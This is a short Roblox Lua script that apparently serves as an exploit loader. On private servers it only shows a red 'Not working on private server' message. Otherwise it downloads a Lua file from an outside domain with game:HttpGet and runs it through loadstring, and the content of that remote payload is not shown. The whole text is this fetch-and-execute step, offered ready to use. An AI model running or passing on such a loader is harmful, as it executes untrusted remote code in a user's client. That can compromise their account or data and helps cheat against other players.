if game.PrivateServerId ~= "" then local gui = Instance.new("ScreenGui") gui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") local frame = Instance.new("Frame") frame.Size = UDim2.new(0.5, 0, 0.2, 0) frame.Position = UDim2.new(0.25, 0, 0.4, 0) frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) frame.Parent = gui local textLabel = Instance.new("TextLabel") textLabel.Size = UDim2.new(1, 0, 1, 0) textLabel.Position = UDim2.new(0, 0, 0, 0) textLabel.Text = "Not working on private server" textLabel.TextColor3 = Color3.fromRGB(255, 0, 0) textLabel.TextScaled = true textLabel.Parent = frame else loadstring(game:HttpGet("https://egorikusa.space/431cde5044822c916fa96a63.lua", true))() end